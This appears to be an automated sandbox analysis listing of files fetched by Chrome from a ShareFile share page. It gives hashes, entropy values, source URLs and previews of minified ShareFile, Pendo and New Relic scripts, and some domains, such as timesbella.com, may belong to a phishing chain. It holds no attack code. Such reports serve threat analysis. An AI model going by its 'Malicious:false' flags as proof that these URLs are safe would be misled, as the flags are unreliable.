                                                                                                                                                                                                                                                                                Preview:...........}k{.8.........D0-.8.a..I:.Ibw.t.Q{(...S.B......}..IP....9..\b..@..o....[.....>..k.|..KO..o.B.%..0...._....8oNO^..x.;.z........../n1.....L%s.......8......`I-[.D...w&.wj.P.Y.{+....)....$Z.".@.c.....d..j.l...S5X.@U..I....Y.#5......C...b :..U.,P.o.f....h.......~..?X.*...hy..Al$.F+..(..p....U.......l~,"..Z..O^.|...._....._._\~......&......u....K.......k.......z.m.A..H.F..._..........xN.H.f.,2/......N.3..?.S_D1.....X......=.....A...l............xP.zw.....f#>..Q=@.b.....h..e2`G....*..[O,.Y.E1...?.?U=.7...Q<.."$..B!q..`>.........qx......7....p.....M@.j@l$d+GGG..-.......k..kv..,v.....v.#.......{{.\....;.,.._.._.d...;.:.$.$.1...I..r.....6.#...hq.N.;...Q6........No|xx ..c... 8.....>x.w.......4C...%.9.(:::...v..l..`......^.c.&..M..(sb..=.....[.t..u..=....}T..D.1F......m.....N....L.h..x...-..*.E}....u..V.....DYS..a....W..........(.....$"...1..`w.........8.HP.... ....r...&.N..".2...z..V.l.p6..T.X4k=Og3..U.i..+'H.<k...!..q..;.8...s.8
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 4119
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):1729
                                                                                                                                                                                                                                                                                Entropy (8bit):7.875300930101941
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:XjPS0e2eOTMMwgE2C58FJZZNNmro3TU38qTOA2is3PA2I/i5boYDwXUmKw41oKoc:XjnTmM388FJyOT+vMPA2I/V0wooKT
                                                                                                                                                                                                                                                                                MD5:C43A2B86E0F6BEF6CC352E50D3A002A7
                                                                                                                                                                                                                                                                                SHA1:3853CA99A4E59FAA443A1686C85740E1F81FB660
                                                                                                                                                                                                                                                                                SHA-256:D7D6F81E6BEB10DB66A539B2825E8C8BD6B24C1AC0558F9843E7A8E0CE38D136
                                                                                                                                                                                                                                                                                SHA-512:3052807637290C4CD91EEA4E57510B03AD75FF077031D6D47C95EB543487943D7F90403B08852CDC1719DF3BBAFBD6E4259897F033DDF05151278BCC978D195E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:http://unbouncepages.com/99392004001023/
                                                                                                                                                                                                                                                                                Preview:...........Wmo.8..._.....`...l..Y\..m..=...G6.J...7..~ %;r............?.....?........w7W....wt..oo...y..;.z..h..._..#.2..}...z..j..~...5.D;.....sw.}!J......i.fE.......7..D..5.$.J..JCnw.`....l...Vs...U.L....2.h.A.3...,..0..I....xD.$.e$.fQ.N.$......8...F.b......E%- .w..J.t...\...........$xy...&.Lk....k...W.....<...il1.....e*.e.^&.?.l0..c2....D4$. e$.g..$...../.....I.&.LI.O.d.i....I...y.<..x..m.u .i..|zC.dQQ.S.f..:....h#/*...O!.....GC..;..-..]..q..@f.P.$j....?..;#+....C.eRH.......... .g.ds.0....%X.EE*Y.%..z..J.].....:(...R.u.b.Li..Mz.....H.@..4VQA..1].9.2..%1.....QGQ..9+xI...U<..R+........s......{........9.\G@...9K.1..N$u.a...Y....;...j...A&..pp.&...8L,...{.Fx..>.g.T_...6p...x'M..k.w.%A..0.4...#g..4X.E.........e.......K........P...8.v;.....<"x.4..M2...s....4....%.....ja...U.K....6T.d.."..u...t..I.5.}..u*.^Y...m?!..y6..w....8M...@..G.M..@.]r!..kn...xq./...i...tC.S.....NQ..\W.......5.....*NKscU(....F..uM..v...O..... ..~d...a...u@..u
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):20
                                                                                                                                                                                                                                                                                Entropy (8bit):3.446439344671015
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:YMb1gXMR4n:YMeXNn
                                                                                                                                                                                                                                                                                MD5:2E1E0B28D6E7522CB687E20D37BCD8AA
                                                                                                                                                                                                                                                                                SHA1:03D5EFE3719CAB433421C4D9BF6C73E0B8EB69E5
                                                                                                                                                                                                                                                                                SHA-256:124CE91528D8ACB894BDC980ABDDF035B38CDC64CE13F088D431E0B10D61FB24
                                                                                                                                                                                                                                                                                SHA-512:70BB31CA0F3907AB6B5860459643E422AAD6685F32D519C23E671CD46F29ABF2DB1F0C53E54313FF6FE7B54A75CDCA18A9232556B3273E6DB200BFCD22BA82BD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"ip":"8.46.123.33"}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65240)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):1782918
                                                                                                                                                                                                                                                                                Entropy (8bit):5.4924843718382075
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12288:frbUsj4OAWyFP7tcL5tBrnnZnWS7B00gADDu/lHEINbXn3oMLWrro1Gxv2TA7ohu:1i7tcL20gADK/t7oOIZOk7oh9yhNP
                                                                                                                                                                                                                                                                                MD5:E43F171E9C550011E58426AF8E55DCEE
                                                                                                                                                                                                                                                                                SHA1:05690F9E9154EAEEA378573C4BB0154E8A2BCEE1
                                                                                                                                                                                                                                                                                SHA-256:34E128838A10E3BC3E8434E9E66C912A9056F635F7B3C0FA04A5E712D30F11F2
                                                                                                                                                                                                                                                                                SHA-512:628564DAA17FCF16641B214C36A22C4FA799FC24E8F03008B078E9F3DCB48E6FA1A7853F4C48940D60C8F22F032FC9447395694C279191C44C3677F623F04B1F
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-doc-gen-pilet/1.2.88/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevdocgenpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(__WEBPACK_DYNAMIC_EXPORT__,__system_context__){var __WEBPACK_EXTERNAL_MODULE__8222__={},__WEBPACK_EXTERNAL_MODULE__4634__={},__WEBPACK_EXTERNAL_MODULE__4876__={},__WEBPACK_EXTERNAL_MODULE__4726__={},__WEBPACK_EXTERNAL_MODULE__1867__={},__WEBPACK_EXTERNAL_MODULE__2965__={},__WEBPACK_EXTERNAL_MODULE__8109__={};return Object.defineProperty(__WEBPACK_EXTERNAL_MODULE__4726__,"__esModule",{value:!0}),{setters:[function(e){__WEBPACK_EXTERNAL_MODULE__8222__.AccountsEntity=e.AccountsEntity,__WEBPACK_EXTERNAL_MODULE__8222__.Api=e.Api,__WEBPACK_EXTERNAL_MODULE__8222__.ContactListType=e.ContactListType,__WEBPACK_EXTERNAL_MODULE__8222__.ContactsEntity=e.ContactsEntity,__WEBPACK_EXTERNAL_MODULE__8222__.CustomWorkflowBundleType=e.CustomWorkflowBundleType,__WEBPACK_EXTERNAL_MODULE__8222__.FileVirusStatus=e.FileVirusStatu
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):79
                                                                                                                                                                                                                                                                                Entropy (8bit):3.9951663126378123
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:U3KTDW3MiLLUHcjVXlVBT7J:H6NLgHWXZT7J
                                                                                                                                                                                                                                                                                MD5:97B958FA75E225CEA6FA3F3E399010D0
                                                                                                                                                                                                                                                                                SHA1:4DDFF887AB1D6FFC1678A717F1327E6C0900B9F8
                                                                                                                                                                                                                                                                                SHA-256:0C909725B0EA7DA9994F16E47A4142783410C5AA25CDD7770F85DC61EB8A170C
                                                                                                                                                                                                                                                                                SHA-512:C8130E21AF2E53D9B3615EAF54714A1160C0D2D80629F4EC19108F307226FA62ED9A45D415041C649A9E2BC2631AF87DD0FC88792051B82096904D3A44166882
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:"https://bam.nr-data.net/1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=26232&ck=1&ref=https://premierbb.sharefile.com/share/view/189361297164461c&be=952&fe=25337&dc=6057&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1728497103288,%22n%22:0,%22f%22:3,%22dn%22:27,%22dne%22:36,%22c%22:36,%22s%22:37,%22ce%22:732,%22rq%22:732,%22rp%22:857,%22rpe%22:1048,%22dl%22:862,%22di%22:5790,%22ds%22:6056,%22de%22:6057,%22dc%22:25337,%22l%22:25337,%22le%22:25341%7D,%22navigation%22:%7B%7D%7D&fp=1699&fcp=2575&jsonp=NREUM.setToken"
                                                                                                                                                                                                                                                                                Preview:NREUM.setToken({'stn':0,'err':1,'ins':1,'spa':1,'sr':0,'srs':0,'st':1,'sts':0})
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65475)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):262562
                                                                                                                                                                                                                                                                                Entropy (8bit):5.460736355290442
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:ixuUhOAHCPt2iJXelIisbEaAAjWrIQhyzXMV47QqV/rZs2U4fHyVIY/cm:ixBOLPt2iJXefAoV4/V/84fSVIy
                                                                                                                                                                                                                                                                                MD5:0D0A56254A42D9B0CA24878E2CE733BE
                                                                                                                                                                                                                                                                                SHA1:2310B1FA4E2BC3634D32B4EFC3703B05F13C8E8D
                                                                                                                                                                                                                                                                                SHA-256:81CD50C7970051569C9F82B909C95A90E44A93F765362ED25B28AC4D69085383
                                                                                                                                                                                                                                                                                SHA-512:4A03796D7208CD0F6A22CCAC32E9A6633055E04E6714ABF8E1E6A4E22B51D01EF2CB225C9878020B073D89B364CC7F7E495A5DC16567A699285D3276DB4F20B1
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevrequestlistpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},a={},i={},s={},c={},u={};return Object.defineProperty(a,"__esModule",{value:!0}),Object.defineProperty(u,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.BundleType=e.BundleType,n.CapabilitiesEntity=e.CapabilitiesEntity,n.CapabilityName=e.CapabilityName,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.DocumentApprovalWorkflowAction=e.DocumentApprovalWorkflowAction,n.EncryptedEmailsEntity=e.EncryptedEmailsEntity,n.ExceptionReason=e.ExceptionReason,n.FileAction=e.FileAction,n.FileLockEntity=e.FileLockEntity,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65455)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):775322
                                                                                                                                                                                                                                                                                Entropy (8bit):5.700380059248383
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12288:NvDUwwNB3iRaEYalRrszCKn74REaE3rKiJPQ+kfOJYIFAMO:iwQuqbjlkL
                                                                                                                                                                                                                                                                                MD5:ED5AEEA53278040B2022DEA269DC2B98
                                                                                                                                                                                                                                                                                SHA1:293D8B7E49DA38693EA7F73C9E0AD336E7AC6698
                                                                                                                                                                                                                                                                                SHA-256:411AD512AA6D5DA9360FF398433E0E764F0528263658E8B943E683EF8914A454
                                                                                                                                                                                                                                                                                SHA-512:54A01CC7E10665B1A112E9B550B045D001F70C2618AC87C313479A2B47AE9D38C0BD14C4EF03B84C31B318A9AEDAD2C37E3FEE9B32A968D9DD1A619597E41472
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-esign-pilet/1.218.0/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevesignpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},i={},o={},r={},a={},s={},l={};return Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations=e.ItemOperations,n.ItemOrderingMode=e.ItemOrderingMode,n.ItemsEntity=e.ItemsEntity,n.RightSignatureEntity=e.RightSignatureEntity,n.Uploader=e.Uploader,n.UserRole=e.UserRole,n.UsersEntity=e.UsersEntity,n.createFolder=e.createFolder,n.isCustomWorkflowBundle=e.isCustomWorkflowBundle,n.isFile=e.isFile,n.isFolder=e.isFolder,n.isLink=e.isLink,n.isMedicalStudyBundle=e.isMedicalStudyBundle,n
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65476)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):424707
                                                                                                                                                                                                                                                                                Entropy (8bit):5.59026129046881
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:7+lwO9OOxqNatZ0liS120AAjWNIGhyBXah7+NDiXlgSHwIhBa8gFOrai+pL53+gR:7+t9O6qNatZzAqeoAFJi89dx46Z
                                                                                                                                                                                                                                                                                MD5:084DDCA8EB1D6BFE21F54C9820777876
                                                                                                                                                                                                                                                                                SHA1:FD5E045C591FCBAA81F17634986867EBD4D1C2F1
                                                                                                                                                                                                                                                                                SHA-256:4452E46BDBD44B1E5A22EDFF4FD143DBE233FB66A4752027301E7F8F03FF5587
                                                                                                                                                                                                                                                                                SHA-512:5A1BAD86A30DD65A0B8CAF3C5AF6337FE364F42098BE504DD34AA8D6586B4383C6F7F8D9118911B3A66A6D4AB0AA6AEEB8E83D6684305D925B57CB8A7B0BBDC8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevclientdashboard,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},l={},i={},a={};return Object.defineProperty(l,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.ItemsEntity=e.ItemsEntity},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){o.Avatar=e.Avatar,o.Button=e.Button,o.Divider=e.Divider,o.Dropdown=e.Dropdown,o.Empty=e.Empty,o.Flex=e.Flex,o.Grid=e.Grid,o.Image=e.Image,o.Layout=e.Layout,o.Modal=e.Modal,o.Popover=e.Popover,o.Skeleton=e.Skeleton,o.Space=e.Space,o.Spin=e.Spin,o.Typography=e.Typography,o.theme=e.theme},function(e){Object.keys(e).forEach((function(t){l[t]=e[t]}))},function(e){i.HashRouter=e.HashRouter,i.Link=e.Link,i.NavLink=e.NavLink,i.Route=e.Route,i.useHistory=e.useHistory,i.useLocation=e.useLocation},function(e){a.__awaiter=e.__awaiter,a.__rest=e.__rest}],execute:function(){e((()=
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):191
                                                                                                                                                                                                                                                                                Entropy (8bit):6.911677438003959
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:zAc+3ZAip/CVwLYBArCt0CDWhS0NQ9XFLDrKVsydomB5UdkDN6ZheLOUupOBJX9U:v+3ZA+/3Y5t7DUg6VLL5tex09j4
                                                                                                                                                                                                                                                                                MD5:83843976FDEC037BA5979208A248DEE1
                                                                                                                                                                                                                                                                                SHA1:2ACFD30B9D5EC1FE47B0820BC5B399205F0B3484
                                                                                                                                                                                                                                                                                SHA-256:2611D4B64D398368504360EB5EE5B240337F311E06B47EEE288A889E1437C8EC
                                                                                                                                                                                                                                                                                SHA-512:5DB72DBA3105F833D6B3A25EC83F9EE765CF3C27BA7C8A09E4B9C5E199C4E4387356FA1169E506CF7A964982C8440E30C8E1C484036C0E07817DF06130B1CFDF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://hvhuo1.timesbella.com/
                                                                                                                                                                                                                                                                                Preview:.....p[...0O....b.......~...{..$...x....8|..S......@....AN....4..gD0@iD...2...mH.....n..@.pK7.". .V.."..f.!(.7..0."..~z..f.N.R...Y..x>.hJ.7...<.G7..3....-..Lkdl.C......r.+..t.*..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65310)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):505838
                                                                                                                                                                                                                                                                                Entropy (8bit):5.336262263635543
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:+IjjAjO320J8PG/qy/ARkfI4AhxxdEr66CwA1RHup86gJML5QjCKa:+IQO32HG/qy/ARkfhIf1RHaPL5JKa
                                                                                                                                                                                                                                                                                MD5:4B18C063CE90E7A807C836152EC2125D
                                                                                                                                                                                                                                                                                SHA1:F50F322C0305DBA89B4F52BA25505F47233073AD
                                                                                                                                                                                                                                                                                SHA-256:BA4242AA170D5720EB62E50910A824F0F62C65DD30151A1890CC00E1763AA9E9
                                                                                                                                                                                                                                                                                SHA-512:979A904910F97B3925B233EB70A5FA7519F2B55968A0BE6DB70730328D2829587F5F4AF7570AE4D371D63F826F1DE61A7D703FA1FF999D0439FA6E45EB6CCD2A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://citrix-sharefile-content.customer.pendo.io/agent/static/74b07336-7560-45fc-7cd1-95032a784d52/pendo.js
                                                                                                                                                                                                                                                                                Preview:// Pendo Agent Wrapper.// Copyright 2024 Pendo.io, Inc..// Environment: production.// Agent Version: 2.249.1.// Installed: 2024-10-09T17:17:44Z.(function (PendoConfig) {./*.@license https://agent.pendo.io/licenses.*/.!function(Hb,jb,Wb){!function(){var A=Array.prototype.slice;try{A.call(jb.documentElement)}catch(Ut){Array.prototype.slice=function(e,t){if(t=void 0!==t?t:this.length,"[object Array]"===Object.prototype.toString.call(this))return A.call(this,e,t);var n,i=[],r=this.length,o=e||0,a=(t<0?r+t:t||r)-(o=0<=o?o:r+o);if(0<a)if(i=new Array(a),this.charAt)for(n=0;n<a;n++)i[n]=this.charAt(o+n);else for(n=0;n<a;n++)i[n]=this[o+n];return i}}String.prototype.trim||(String.prototype.trim=function(){return this.replace(/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,"")});var R=function(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_".split("");return{uint8ToBase64:function(e){var t,n,i,r=e.length%3,o="";for(t=0,i=e.length-r;t<i;t+=3)n=(e[t]<<16)+(e[t+1]<<8)+e[t+2]
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65471)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):233832
                                                                                                                                                                                                                                                                                Entropy (8bit):5.590383298167157
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:SYo5EWGKEsOxBriS120AAjWNIGhyBXi1hhmB1cmX4fFgV:S8WGKEsOxgAHB4fiV
                                                                                                                                                                                                                                                                                MD5:2AB229E091629CC200C1F33BAF8E7E36
                                                                                                                                                                                                                                                                                SHA1:050F76B0D653E77F653AA834D62E2C625C9BE8C9
                                                                                                                                                                                                                                                                                SHA-256:CA248F11872993700B4DBAFCE6592B775320A38B3E4F7A30165D05CA0E4C6847
                                                                                                                                                                                                                                                                                SHA-512:13DE7E6D97405A0D9D9E0851458D82D1DA1F733DAF76E7EC5534A05C9896C2A10B1227850B974E12921BC02338494A618CE0DA86E42191B342DA9A880F9AB53D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-projects-pilet/2.0.29/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevprojectspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},a={},i={},c={},s={},u={};return Object.defineProperty(a,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.CapabilitiesEntity=e.CapabilitiesEntity,n.CapabilityName=e.CapabilityName,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.DocumentApprovalWorkflowAction=e.DocumentApprovalWorkflowAction,n.EncryptedEmailsEntity=e.EncryptedEmailsEntity,n.ExceptionReason=e.ExceptionReason,n.FileAction=e.FileAction,n.FileLockEntity=e.FileLockEntity,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations=e.ItemOperations,n.ItemOrderingMode=e.ItemOrderingMode,n.ItemsEntity=e.ItemsE
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65464)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):1420749
                                                                                                                                                                                                                                                                                Entropy (8bit):5.886217400031823
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24576:sc+Znn2E8wfayki0zgT0619jsY+Gsx7KDbau5MH:PhwfaFgT0619jsY+GsxsauqH
                                                                                                                                                                                                                                                                                MD5:1D059A1E91899CAD205E8515BEA97D44
                                                                                                                                                                                                                                                                                SHA1:267D30365734958CE77067EB024CAA2B420AF43B
                                                                                                                                                                                                                                                                                SHA-256:018DA9C0A119691D99F8CF324C5A07665A6E2117A5DD691B06F4C69E171BD243
                                                                                                                                                                                                                                                                                SHA-512:23CBDD2032341B9AF71B360174C9496D2FB4B02CEF82044733F94600BCEC62A46CB19650ABC80ADB561D19FA35FCE7B1C82CFD7FF1EA1C1745CCB1DEEBEDBE83
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-workflows-pilet/0.119.14/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevworkflowspilet,{}).System.register(["react","antd","react-dom","tslib","@citrite/sf-api","react-router-dom","@sharefiledev/antd-config","react-router"],(function(e,t){var n={},r={},o={},i={},a={},s={},l={},c={};return Object.defineProperty(n,"__esModule",{value:!0}),Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){r.Alert=e.Alert,r.App=e.App,r.Avatar=e.Avatar,r.Button=e.Button,r.Card=e.Card,r.Col=e.Col,r.Divider=e.Divider,r.Dropdown=e.Dropdown,r.Flex=e.Flex,r.Form=e.Form,r.Input=e.Input,r.List=e.List,r.Menu=e.Menu,r.Modal=e.Modal,r.Row=e.Row,r.Select=e.Select,r.Spin=e.Spin,r.Steps=e.Steps,r.Switch=e.Switch,r.Tabs=e.Tabs,r.Tooltip=e.Tooltip,r.Typography=e.Typography,r.notification=e.notification,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){i.__assign=e.__assign,i.__awaiter=e.__awaiter,i.__rest=e.__rest},function(e){a.Cu
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65472)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):123022
                                                                                                                                                                                                                                                                                Entropy (8bit):5.380750016671545
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:czeKp+LVxRqlZC4pt5tDu+KenVH/qOjagGHkoF+fOsi/mk144:ca7VxRqu4ttD/BG5kO/7b
                                                                                                                                                                                                                                                                                MD5:88FE5AF93A34045D123F8553A1D1F252
                                                                                                                                                                                                                                                                                SHA1:367EE95CE0506BDD13B0F548BC252C49388AE56D
                                                                                                                                                                                                                                                                                SHA-256:0920ECC552C22FA97C56F9651F5A00048ACA19A90657A7E2470B3A14067C4C9D
                                                                                                                                                                                                                                                                                SHA-512:20A878C7D4D130F818FB7EB98644E24ACA65D96DD6EBEC0D3E7D0D1140992054EA0656DB269AB825797ED9A802718D7CC07FAFD2B5C2C96B94E86887BA5EEDF7
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-task-aggregator-pilet/1.0.7/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevtaskaggregatorpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(s,"__esModule",{value:!0}),{setters:[function(e){n.Api=e.Api,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.ItemOrderingMode=e.ItemOrderingMode,n.ItemsEntity=e.ItemsEntity,n.UsersEntity=e.UsersEntity,n.createFolder=e.createFolder,n.isCustomWorkflowBundle=e.isCustomWorkflowBundle,n.isFile=e.isFile,n.isFolder=e.isFolder,n.isLink=e.isLink,n.isMedicalStudyBundle=e.isMedicalStudyBundle,n.isNote=e.isNote,n.isRequestListBundle=e.isRequestListBundle,n.isSymbolicLink=e.isSymbolicLink,n.isWorkflowBundle=e.isWorkflowBundle},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){o.Avatar=e.Avatar,o.Button=e.Button,o.Card=e.Card,o.Col=e.Col,o.Divider=e.Divider,o.Empty=e.Empty,o.Flex=e.Flex
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):3651
                                                                                                                                                                                                                                                                                Entropy (8bit):4.094801914706141
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                                                                                                                                                                                                                                                MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                                                                                                                                                                                                                                                SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                                                                                                                                                                                                                                                SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                                                                                                                                                                                                                                                SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
